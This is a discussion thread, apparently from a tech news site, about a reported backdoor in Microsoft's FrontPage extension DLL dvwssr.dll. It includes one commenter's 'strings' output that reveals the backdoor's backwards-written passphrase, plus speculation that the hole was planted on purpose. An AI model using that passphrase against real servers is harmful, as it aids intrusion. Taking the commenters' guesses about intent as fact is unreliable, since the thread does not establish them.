If nothing else, this shows a clear hole in MS quality control procedures. If this sort of feelings are common inside MS, they may well be running into more serious problems than anything DOJ can give them...
In Murphy We Turst
You know, it's funny. BugTraq recently posted news of a covert backdoor(obfuscated code, etc.) embedded in some minor commercial CGI out there. I considered posting it to Slashdot, but since once of the core magnifiers of a security breach is its universality(and I really didn't think that many people were using the script), I didn't think it'd get through the submission queue.
Looks like Microsoft solved *that* problem for me, eh?
They'll try to spin it, but there's really no good way to announce that there's a mission critical backdoor distributed in what appears to be an otherwise useless file. Assume the normal best case scenario: Some temp checked in the code on a lark.
So, that basically means some temp that checks in code on a lark can insert a mission critical security hole that will affect hundreds of thousands of businesses and millions of consumers.
Move up the chain. If it was a low grade employee who did it...if it was a small group of humorists angry about their easter egg being quelled...if Bill Gates himself did it and only he knew...worst case scenario, if Microsoft itself has no idea where this came from, but it got there...
Then anyone sufficiently powerful can insert a globally available backdoor.
The only defense? Microsoft was merely building in functionality allowing it to exercise its rights under UCITA to deny service to EULA violating customers(like websites that provide benchmarking statistics!).
Now, I'm no Congressman, but when a company in Washington State is backing state bills that let it shut down a company in New York State, that sure sounds to me like a rather inappropriate regulation of Interstate Commerce. Say what you will about the abuse of federal powers vs. state rights; UCITA's one scheme that would have been used to hold Microsoft's portion of the Internet Economy hostage to a humorously named but cryptographically bare passphrase that any 14 year old with half a brain could find.
If they've got a right to shut down software remotely, they've got a right to put in the backdoor that does it. That's how they were planning to get out of this disaster, which I'm sure they've known about for quite some time.
We need federal protection against those who would sell us malicious code by pushing corrupt state laws through the legislatures. UCITA was born when it failed to pass congressional muster; it failed to pass for a very good reason. In an age when the Interstate Commerce clause has been abused to no end, millions of Americans must now worry about billions of dollars of their money being stolen by anyone running a Microsoft server. The company will put on a valiant show, but while one face is talking customer protection, the other is lobbying as hard as it can to eliminate any rights customers might have against such attacks.
Microsoft is no longer invincible; fighting its legislative agenda is no death sentence. This intentionally released security hole clearly illustrates just what kinds of dangers UCITA opens up to the American consumer, for beyond even the simple analysis that Microsoft could claim this to be their legally protected implementation of a granted right...UCITA also bolsters Microsoft's right to sue whoever even looks for such a security hole, on the basis of a signed away right to reverse engineer.
You can't find the bugs. You can't demand the bugs be removed. You can't even tell anyone about the bugs. If this isn't a restriction of Interstate Commerce--among several other well cherished rights--I don't know what is.
Yours Truly,
Dan Kaminsky
DoxPara Research
http://www.doxpara.com
david@cold:~ > strings dvwssr.dll ..
... bunch of crap..
/global.asa
.asp
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
.. more crap
see the hidden message? hint.. its backwards.
"Apparently if you play the Windows NT CD backwards you hear satanic messages"
"You think that's bad, if you play it forwards it installs Windows NT!"
orlando...
-= This is a self-referential sig =-
So M$'s bug affects Apache then? ;-P
--
Eric S. Raymond said just this week that the open source model has one strength that closed source truly lacks, and can never have - peer review. All other "professional" endeavours of this magnitude have it (civil engineering was his example) and those professions are all the better for it.
Closed source development where quality is a focus does have quite a lot of review, by peers, and others. And the whole process (architecture, design, code and test) is fully reviewed in a structured method that ensures that everything is covered, not just the 'gee wizz' bits.
HOWEVER, this is not how Micro$oft and most other 'software houses' work.. It is used by places that truely care about software quality (NASA for instance). I used to work for Motorola developing for safety-critical systems, and peer review was very strong. I was a sysadmin and I was subject to review!
Check out the CMM (Capability Maturity Model) from the SEI. Compare it with the list of things that most of us consider open source strengths, you might be surprised. If done right, it allows bug free (and I do mean free, as in no signifigent bugs at all!) development.
Just because the likes of Micro$oft cannot be bothered to use this stuff, does not mean that closed source can -never- deliver quality or security. It just costs more.
EZ
-'Press Ctrl + Alt + Delete to log on..'
"Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
I heard that if you install Windows 98 backwards, it works.
--
it's a sig, wtf?
The CBS article makes this clearer: it is the IIS FrontPage extensions.
I'm really, really having trouble believeing this.
That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!), thus playing right into the hands of the open-source-is-good-for-security argument, and no-one at MS noticed it... the mind boggles.
There's nothing up on microsoft.com about it yet either, which also strikes me as strange. Is this really true? If so, it must be the security howler of the year.
I personally can't check if it works as a backdoor, since on the NT web server here I deliberately de-installed all the crap IIS wants you to have (unnecessary script mappings, example sites, web admin, FrontPage extensions...). Contrary to what some sysadmins seem to think, security does not lie in keeping all the Microsoft default settings.
Jesus wept. Prepare for a lot of defaced web sites.
--
This comment was brought to you by And Clover.
That Microsoft's developers could be so recklessly dumb as to add a backdoor that will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!),
.dll. By decrypting this copyrighted text, you have violated Section 1201 of the DCMA. Come along quietly and no one will get hurt.
The plaintext is encrypted by writing it backwards in the
Anomalous: inconsistent with or deviating from what is usual, normal, or expected
Anomalous: deviating from what is usual, normal, or expected
Canard: a false or unfounded repor
Heres a link to the file dvwssr.dll for those who still think its a belated April Fool